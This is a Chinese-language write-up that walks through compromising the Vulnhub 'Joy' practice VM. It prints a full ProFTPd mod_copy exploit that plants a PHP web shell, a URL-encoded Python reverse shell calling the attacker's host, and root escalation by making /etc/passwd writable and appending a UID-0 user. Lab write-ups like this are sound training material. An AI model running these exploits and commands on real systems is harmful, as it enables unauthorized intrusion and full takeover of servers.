Vulnhub之Joy靶机详细测试过程
Joy
作者: jason_huawen
靶机基本信息
名称:digitalworld.local: JOY
地址:
https://www.vulnhub.com/entry/digitalworldlocal-joy,298/
识别目标主机IP地址
(kali㉿kali)-[~/Vulnhub/Joy]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.59.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:9a:9e:c2 1 60 PCS Systemtechnik GmbH
192.168.56.254 08:00:27:e4:d2:fe 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的Netdiscover工具识别目标主机的IP地址为192.168.56.254
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-04 05:46 EST
Nmap scan report for localhost (192.168.56.254)
Host is up (0.00021s latency).
Not shown: 65523 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download
|_drwxrwxr-x 2 ftp ftp 4096 Jan 10 2019 upload
22/tcp open ssh Dropbear sshd 0.34 (protocol 2.0)
25/tcp open smtp Postfix smtpd
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after: 2028-12-20T14:29:24
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.25
|_http-title: Index of /
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2016-07-19 20:03 ossec/
|_
|_http-server-header: Apache/2.4.25 (Debian)
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: CAPA TOP PIPELINING UIDL AUTH-RESP-CODE RESP-CODES STLS SASL
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after: 2032-10-05T17:23:23
|_ssl-date: TLS randomness does not represent time
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: SASL-IR LITERAL+ IMAP4rev1 LOGIN-REFERRALS ENABLE Pre-login IDLE have post-login listed capabilities OK STARTTLS LOGINDISABLEDA0001 more ID
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after: 2032-10-05T17:23:23
|_ssl-date: TLS randomness does not represent time
445/tcp open netbios-ssn Samba smbd 4.5.12-Debian (workgroup: WORKGROUP)
465/tcp open smtp Postfix smtpd
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after: 2028-12-20T14:29:24
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
|_ssl-date: TLS randomness does not represent time
587/tcp open smtp Postfix smtpd
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after: 2028-12-20T14:29:24
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap Dovecot imapd
|_imap-capabilities: SASL-IR LITERAL+ IMAP4rev1 ENABLE Pre-login IDLE LOGIN-REFERRALS have post-login listed AUTH=PLAINA0001 capabilities OK more ID
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after: 2032-10-05T17:23:23
995/tcp open ssl/pop3 Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: CAPA TOP USER UIDL AUTH-RESP-CODE RESP-CODES PIPELINING SASL(PLAIN)
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after: 2032-10-05T17:23:23
MAC Address: 08:00:27:E4:D2:FE (Oracle VirtualBox virtual NIC)
Service Info: Hosts: The, JOY.localdomain, 127.0.1.1, JOY; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 5h19m58s, deviation: 4h37m07s, median: 7h59m57s
|_nbstat: NetBIOS name: JOY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.5.12-Debian)
| Computer name: joy
| NetBIOS computer name: JOY\x00
| Domain name: \x00
| FQDN: joy
|_ System time: 2022-12-05T02:46:47+08:00
| smb2-time:
| date: 2022-12-04T18:46:48
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.29 seconds
获得Shell
──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ ftp 192.168.56.254
Connected to 192.168.56.254.
220 The Good Tech Inc. FTP Server
Name (192.168.56.254:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||23165|)
150 Opening ASCII mode data connection for file list
drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download
drwxrwxr-x 2 ftp ftp 4096 Jan 10 2019 upload
226 Transfer complete
ftp> ls -alh
229 Entering Extended Passive Mode (|||46554|)
150 Opening ASCII mode data connection for file list
drwxr-x--- 4 ftp ftp 4.0k Jan 6 2019 .
drwxr-x--- 4 ftp ftp 4.0k Jan 6 2019 ..
drwxrwxr-x 2 ftp ftp 4.0k Jan 6 2019 download
drwxrwxr-x 2 ftp ftp 4.0k Jan 10 2019 upload
226 Transfer complete
ftp> cd download
250 CWD command successful
ftp> ls -alh
229 Entering Extended Passive Mode (|||35903|)
150 Opening ASCII mode data connection for file list
drwxrwxr-x 2 ftp ftp 4.0k Jan 6 2019 .
drwxr-x--- 4 ftp ftp 4.0k Jan 6 2019 ..
226 Transfer complete
ftp> cd ..
250 CWD command successful
ftp> ls
229 Entering Extended Passive Mode (|||23286|)
150 Opening ASCII mode data connection for file list
drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download
drwxrwxr-x 2 ftp ftp 4096 Jan 10 2019 upload
226 Transfer complete
ftp> cd upload
250 CWD command successful
ftp> ls -alh
229 Entering Extended Passive Mode (|||39457|)
150 Opening ASCII mode data connection for file list
drwxrwxr-x 2 ftp ftp 4.0k Jan 10 2019 .
drwxr-x--- 4 ftp ftp 4.0k Jan 6 2019 ..
-rwxrwxr-x 1 ftp ftp 1.9k Dec 4 18:48 directory
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_armadillo
-rw-rw-rw- 1 ftp ftp 25 Jan 6 2019 project_bravado
-rw-rw-rw- 1 ftp ftp 88 Jan 6 2019 project_desperado
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_emilio
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_flamingo
-rw-rw-rw- 1 ftp ftp 7 Jan 6 2019 project_indigo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_komodo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_luyano
-rw-rw-rw- 1 ftp ftp 8 Jan 6 2019 project_malindo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_okacho
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_polento
-rw-rw-rw- 1 ftp ftp 20 Jan 6 2019 project_ronaldinho
-rw-rw-rw- 1 ftp ftp 55 Jan 6 2019 project_sicko
-rw-rw-rw- 1 ftp ftp 57 Jan 6 2019 project_toto
-rw-rw-rw- 1 ftp ftp 5 Jan 6 2019 project_uno
-rw-rw-rw- 1 ftp ftp 9 Jan 6 2019 project_vivino
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_woranto
-rw-rw-rw- 1 ftp ftp 20 Jan 6 2019 project_yolo
-rw-rw-rw- 1 ftp ftp 180 Jan 6 2019 project_zoo
-rwxrwxr-x 1 ftp ftp 24 Jan 6 2019 reminder
226 Transfer complete
ftp> get reminder
local: reminder remote: reminder
229 Entering Extended Passive Mode (|||61399|)
150 Opening BINARY mode data connection for reminder (24 bytes)
100% |*********************************************************************************| 24 37.80 KiB/s 00:00 ETA
226 Transfer complete
24 bytes received in 00:00 (21.90 KiB/s)
ftp> get directory
local: directory remote: directory
229 Entering Extended Passive Mode (|||25671|)
150 Opening BINARY mode data connection for directory (1908 bytes)
100% |*********************************************************************************| 1908 90.98 MiB/s 00:00 ETA
226 Transfer complete
1908 bytes received in 00:00 (4.90 MiB/s)
ftp> get project_*
local: project_* remote: project_*
229 Entering Extended Passive Mode (|||22671|)
550 project_*: No such file or directory
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ gobuster dir -u http://192.168.56.254 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.254
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/04 05:53:24 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 302]
Progress: 219739 / 220561 (99.63%)===============================================================
2022/12/04 05:54:14 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ gobuster dir -u http://192.168.56.254/ossec/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.254/ossec/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/04 05:54:43 Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 320] [--> http://192.168.56.254/ossec/img/]
/site (Status: 301) [Size: 321] [--> http://192.168.56.254/ossec/site/]
/css (Status: 301) [Size: 320] [--> http://192.168.56.254/ossec/css/]
/lib (Status: 301) [Size: 320] [--> http://192.168.56.254/ossec/lib/]
/README (Status: 200) [Size: 2106]
/js (Status: 301) [Size: 319] [--> http://192.168.56.254/ossec/js/]
/tmp (Status: 301) [Size: 320] [--> http://192.168.56.254/ossec/tmp/]
/LICENSE (Status: 200) [Size: 35745]
Progress: 219775 / 220561 (99.64%)===============================================================
2022/12/04 05:55:34 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ gobuster dir -u http://192.168.56.254/ossec/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.sh,.html
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.254/ossec/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,txt,sh,html
[+] Timeout: 10s
===============================================================
2022/12/04 05:56:09 Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 13139]
/.html (Status: 403) [Size: 300]
/.php (Status: 403) [Size: 299]
/img (Status: 301) [Size: 320] [--> http://192.168.56.254/ossec/img/]
/site (Status: 301) [Size: 321] [--> http://192.168.56.254/ossec/site/]
/css (Status: 301) [Size: 320] [--> http://192.168.56.254/ossec/css/]
/lib (Status: 301) [Size: 320] [--> http://192.168.56.254/ossec/lib/]
/README (Status: 200) [Size: 2106]
/js (Status: 301) [Size: 319] [--> http://192.168.56.254/ossec/js/]
/setup.sh (Status: 200) [Size: 2471]
/tmp (Status: 301) [Size: 320] [--> http://192.168.56.254/ossec/tmp/]
/LICENSE (Status: 200) [Size: 35745]
/.php (Status: 403) [Size: 299]
/.html (Status: 403) [Size: 300]
Progress: 1101116 / 1102805 (99.85%)===============================================================
2022/12/04 06:00:32 Finished
===================================================
目录和文件扫描以后,并且访问这些目录或者文件,并没有可利用的目录文件。
扫描一下UDP端口:
┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ sudo nmap -sU --top-ports 50 192.168.56.254 -T4 -v
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-04 06:07 EST
Initiating ARP Ping Scan at 06:07
Scanning 192.168.56.254 [1 port]
Completed ARP Ping Scan at 06:07, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:07
Completed Parallel DNS resolution of 1 host. at 06:07, 0.01s elapsed
Initiating UDP Scan at 06:07
Scanning localhost (192.168.56.254) [50 ports]
Increasing send delay for 192.168.56.254 from 0 to 50 due to max_successful_tryno increase to 5
Discovered open port 161/udp on 192.168.56.254
Discovered open port 123/udp on 192.168.56.254
Increasing send delay for 192.168.56.254 from 50 to 100 due to max_successful_tryno increase to 6
Discovered open port 137/udp on 192.168.56.254
Warning: 192.168.56.254 giving up on port because retransmission cap hit (6).
Completed UDP Scan at 06:08, 23.89s elapsed (50 total ports)
Nmap scan report for localhost (192.168.56.254)
Host is up (0.00096s latency).
PORT STATE SERVICE
7/udp open|filtered echo
53/udp closed domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp open|filtered tftp
80/udp open|filtered http
111/udp closed rpcbind
123/udp open ntp
135/udp closed msrpc
136/udp closed profile
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
139/udp closed netbios-ssn
161/udp open snmp
162/udp open|filtered snmptrap
445/udp closed microsoft-ds
500/udp open|filtered isakmp
514/udp closed syslog
518/udp open|filtered ntalk
520/udp open|filtered route
593/udp closed http-rpc-epmap
626/udp closed serialnumberd
631/udp open|filtered ipp
996/udp open|filtered vsinet
997/udp closed maitrd
998/udp closed puparp
999/udp open|filtered applix
1025/udp open|filtered blackjack
1026/udp closed win-rpc
1027/udp open|filtered unknown
1433/udp open|filtered ms-sql-s
1434/udp open|filtered ms-sql-m
1645/udp closed radius
1646/udp closed radacct
1701/udp closed L2TP
1812/udp open|filtered radius
1900/udp open|filtered upnp
2048/udp closed dls-monitor
2049/udp closed nfs
2222/udp closed msantipiracy
3283/udp closed netassistant
3456/udp closed IISrpc-or-vat
4500/udp closed nat-t-ike
5060/udp closed sip
5353/udp open|filtered zeroconf
20031/udp open|filtered bakbonenetvault
32768/udp closed omad
49152/udp closed unknown
49153/udp closed unknown
49154/udp closed unknown
MAC Address: 08:00:27:E4:D2:FE (Oracle VirtualBox virtual NIC)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 24.26 seconds
Raw packets sent: 273 (16.867KB) | Rcvd: 37 (3.808KB)
UDP扫描发现SNMP端口是开放。但是没有太大价值,还是需要围绕FTP,因为NMAP扫描时知道其服务为ProFTP,但是不知道版本,从Ftp下载的directory文件中有个version_control文件,但是不知道文件内容,看是否可以用ProFTPd的拷贝漏洞将其内容拿到:
┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ telnet 192.168.56.254 21
Trying 192.168.56.254...
Connected to 192.168.56.254.
Escape character is '^]'.
220 The Good Tech Inc. FTP Server
site cpfr /home/patrick/version_control
350 File or directory exists, ready for destination name
site cpto /home/ftp/upload/version_control
250 Copy successful
^Cquit
221 Goodbye.
Connection closed by foreign host.
此时再FTP到服务器,即可看到version_control文件了,将其下载到本地进行查看:
┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ cat version_control
Version Control of External-Facing Services:
Apache: 2.4.25
Dropbear SSH: 0.34
ProFTPd: 1.3.5
Samba: 4.5.12
We should switch to OpenSSH and upgrade ProFTPd.
Note that we have some other configurations in this machine.
1. The webroot is no longer /var/www/html. We have changed it to /var/www/tryingharderisjoy.
2. I am trying to perform some simple bash scripting tutorials. Let me see how it turns out.
知道了ProFTPd的确切版本后,看有无漏洞:
找到漏洞利用代码:
https://www.exploit-db.com/exploits/36803
将其下载到本地:
┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ cat 36803.py
# Title: ProFTPd 1.3.5 Remote Command Execution
# Date : 20/04/2015
# Author: R-73eN
# Software: ProFTPd 1.3.5 with mod_copy
# Tested : Kali Linux 1.06
# CVE : 2015-3306
# Greetz to Vadim Melihow for all the hard work .
import socket
import sys
import requests
#Banner
banner = ""
banner += " ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if(len(sys.argv) < 4):
print '\n Usage : exploit.py server directory cmd'
else:
server = sys.argv[1] #Vulnerable Server
directory = sys.argv[2] # Path accessible from web .....
cmd = sys.argv[3] #PHP payload to be executed
evil = '<?php system("' + cmd + '") ?>'
s.connect((server, 21))
s.recv(1024)
print '[ + ] Connected to server [ + ] \n'
s.send('site cpfr /etc/passwd')
s.recv(1024)
s.send('site cpto ' + evil)
s.recv(1024)
s.send('site cpfr /proc/self/fd/3')
s.recv(1024)
s.send('site cpto ' + directory + 'infogen.php')
s.recv(1024)
s.close()
print '[ + ] Payload sended [ + ]\n'
print '[ + ] Executing Payload [ + ]\n'
r = requests.get('http://' + server + '/infogen.php') #Executing PHP payload through HTTP
if (r.status_code == 200):
print '[ * ] Payload Executed Succesfully [ * ]'
else:
print ' [ - ] Error : ' + str(r.status_code) + ' [ - ]'
print '\n http://infogen.al/'
┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ python2 36803.py 192.168.56.254 /ossec id
___ __ ____ _ _
|_ _|_ __ / _| ___ / ___| ___ _ __ / \ | |
| || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | |
| || | | | _| (_) | |_| | __/ | | | / ___ \| |___
|___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|
[ + ] Connected to server [ + ]
id
^CTraceback (most recent call last):
File "36803.py", line 31, in <module>
s.recv(1024)
KeyboardInterrupt
执行没有结果。
找到另外一个漏洞利用代码:
https://github.com/t0kx/exploit-CVE-2015-3306
┌──(kali㉿kali)-[~/Vulnhub/Joy/exploit-CVE-2015-3306-master]
└─$ python exploit.py --host 192.168.56.254 --port 21 --path "/var/www/tryingharderisjoy"
[+] CVE-2015-3306 exploit by t0kx
[+] Exploiting 192.168.56.254:21
[+] Target exploited, acessing shell at http://192.168.56.254/backdoor.php
[+] Running whoami: www-data
[+] Done
访问:
http://192.168.56.254/backdoor.php?cmd=id
可以成功得到结果,接下来设法获得反向shell:
访问:
http://192.168.56.254/backdoor.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.206%22,5555));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22])%27
kali linux上成功得到了反弹回来的shell:
┌──(kali㉿kali)-[~/Vulnhub/Joy/exploit-CVE-2015-3306-master]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 36146
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data),123(ossec)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@JOY:/var/www/tryingharderisjoy$ ls
ls
backdoor.php ossec
www-data@JOY:/var/www/tryingharderisjoy$ cd ossec
cd ossec
www-data@JOY:/var/www/tryingharderisjoy/ossec$ ls -alh
ls -alh
total 116K
drwxr-xr-x 8 www-data www-data 4.0K Jan 6 2019 .
drwxr-xr-x 3 www-data www-data 4.0K Dec 5 03:31 ..
-rw-r--r-- 1 www-data www-data 92 Jul 19 2016 .hgtags
-rw-r--r-- 1 www-data www-data 262 Dec 28 2018 .htaccess
-rw-r--r-- 1 www-data www-data 44 Dec 28 2018 .htpasswd
-rwxr-xr-x 1 www-data www-data 317 Jul 19 2016 CONTRIB
-rw-r--r-- 1 www-data www-data 35K Jul 19 2016 LICENSE
-rw-r--r-- 1 www-data www-data 2.1K Jul 19 2016 README
-rw-r--r-- 1 www-data www-data 923 Jul 19 2016 README.search
drwxr-xr-x 3 www-data www-data 4.0K Jul 19 2016 css
-rw-r--r-- 1 www-data www-data 218 Jul 19 2016 htaccess_def.txt
drwxr-xr-x 2 www-data www-data 4.0K Jul 19 2016 img
-rwxr-xr-x 1 www-data www-data 5.1K Jul 19 2016 index.php
drwxr-xr-x 2 www-data www-data 4.0K Jul 19 2016 js
drwxr-xr-x 3 www-data www-data 4.0K Dec 28 2018 lib
-rw-r--r-- 1 www-data www-data 462 Jul 19 2016 ossec_conf.php
-rw-r--r-- 1 www-data www-data 134 Jan 6 2019 patricksecretsofjoy
-rwxr-xr-x 1 www-data www-data 2.5K Jul 19 2016 setup.sh
drwxr-xr-x 2 www-data www-data 4.0K Dec 28 2018 site
drwxrwxrwx 2 www-data www-data 4.0K Dec 28 2018 tmp
www-data@JOY:/var/www/tryingharderisjoy/ossec$ cat ossec_conf.php
cat ossec_conf.php
www-data@JOY:/var/www/tryingharderisjoy/ossec$ cat patricksecretsofjoy
cat patricksecretsofjoy
credentials for JOY:
patrick:apollo098765
root:howtheheckdoiknowwhattherootpasswordis
how would these hack3rs ever find such a page?
www-data@JOY:/var/www/tryingharderisjoy/ossec$ su - root
su - root
Password: howtheheckdoiknowwhattherootpasswordis
su: Authentication failure
www-data@JOY:/var/www/tryingharderisjoy/ossec$ su - root
su - root
Password: howtheheckdoiknowwhattherootpasswordis
su: Authentication failure
www-data@JOY:/var/www/tryingharderisjoy/ossec$ su - patrick
su - patrick
Password: apollo098765
patrick@JOY:~$ id
id
uid=1000(patrick) gid=1000(patrick) groups=1000(patrick),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),118(scanner),1001(ftp)
patrick@JOY:~$
提权
patrick@JOY:~/.config$ sudo -l
sudo -l
Matching Defaults entries for patrick on JOY:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User patrick may run the following commands on JOY:
(ALL) NOPASSWD: /home/patrick/script/test
patrick@JOY:/tmp$ sudo -u root /home/patrick/script/test
sudo -u root /home/patrick/script/test
I am practising how to do simple bash scripting!
What file would you like to change permissions within this directory?
../../../../../../../etc/passwd
../../../../../../../etc/passwd
What permissions would you like to set the file to?
777
777
Currently changing file permissions, please wait.
Tidying up...
Done!
patrick@JOY:/tmp$ ls -alh /etc/passwd
ls -alh /etc/passwd
-rwxrwxrwx 1 root root 2.5K Jan 28 2019 /etc/passwd
patrick@JOY:/tmp$
由于test只允许修改/script目录下的文件的权限,所以需要绕过:
这样我们就可以修改/etc/passwd,将root密码删除:
patrick@JOY:/tmp$ nano /etc/passwd
nano /etc/passwd
Error opening terminal: unknown.
patrick@JOY:/tmp$
但是不能用NanO
看来只能追加内容:
patrick@JOY:~$ sed -i '1c root::0:0:root:/root:/bin/bash' /etc/passwd
sed -i '1c root::0:0:root:/root:/bin/bash' /etc/passwd
sed: couldn't open temporary file /etc/sedu0TEOo: Permission denied
patrick@JOY:~$ which sed
which sed
/bin/sed
patrick@JOY:~$ id
id
uid=1000(patrick) gid=1000(patrick) groups=1000(patrick),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),118(scanner),1001(ftp)
patrick@JOY:~$ echo 'test' >> /etc/passwd
echo 'test' >> /etc/passwd
patrick@JOY:~$
可以创建一个用户,赋予root权限
┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ openssl passwd -1 -salt jason 12345
$1$jason$qsg4ck0ojTQvTEpTDPg2C1
将用户jason,追加到/etc/passwd文件中去:
patrick@JOY:~$ echo 'jason:$1$jason$qsg4ck0ojTQvTEpTDPg2C1:0:0:root:/root:/bin/bash' >>/etc/passwd
<vTEpTDPg2C1:0:0:root:/root:/bin/bash' >>/etc/passwd
patrick@JOY:~$ su jason
su jason
Password: 12345
root@JOY:/home/patrick# cd /root
cd /root
root@JOY:~# ls -alh
ls -alh
total 104K
drwx------ 8 root root 4.0K Jan 28 2019 .
drwxr-xr-x 23 root root 4.0K Jan 6 2019 ..
---------- 1 root root 1.4K Jan 27 2019 author-secret.txt
-rw------- 1 root root 3.1K Jan 28 2019 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwx------ 3 root root 4.0K Jan 5 2019 .cache
drwxr-xr-x 5 root root 4.0K Jan 5 2019 .config
drwx------ 3 root root 4.0K Jan 5 2019 .dbus
-rw-r--r-- 1 root root 435 Jan 7 2019 document-generator.sh
-rw-r--r-- 1 root root 1.3K Jan 28 2019 dovecot.crt
-rw-r--r-- 1 root root 1.1K Jan 28 2019 dovecot.csr
-rw------- 1 root root 1.7K Jan 28 2019 dovecot.key
drwxr-xr-x 3 root root 4.0K Jan 5 2019 .local
-rw------- 1 root root 231 Dec 28 2018 .msmtprc
-rw------- 1 root root 36 Dec 28 2018 .mysql_history
drwxr-xr-x 2 root root 4.0K Dec 28 2018 .nano
-rw-r--r-- 1 root root 540 Jan 10 2019 permissions.sh
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
---------- 1 root root 71 Jan 10 2019 proof.txt
-rw------- 1 root root 1.0K Jan 28 2019 .rnd
-rw------- 1 root root 1.7K Jan 28 2019 rootCA.key
-rw-r--r-- 1 root root 1.5K Jan 28 2019 rootCA.pem
-rw-r--r-- 1 root root 17 Jan 28 2019 rootCA.srl
-rw-r--r-- 1 root root 66 Jan 6 2019 .selected_editor
drwx------ 2 root root 4.0K Jan 6 2019 .ssh
-rw-r--r-- 1 root root 209 Dec 28 2018 .wget-hsts
root@JOY:~# cat proof.txt
cat proof.txt
Never grant sudo permissions on scripts that perform system functions!
root@JOY:~#
成功拿到了root flag.
经验教训
- 本靶机从80 web服务中基本上没有获取有价值的信息。
STRIVE FOR PROGRESS,NOT FOR PERFECTION
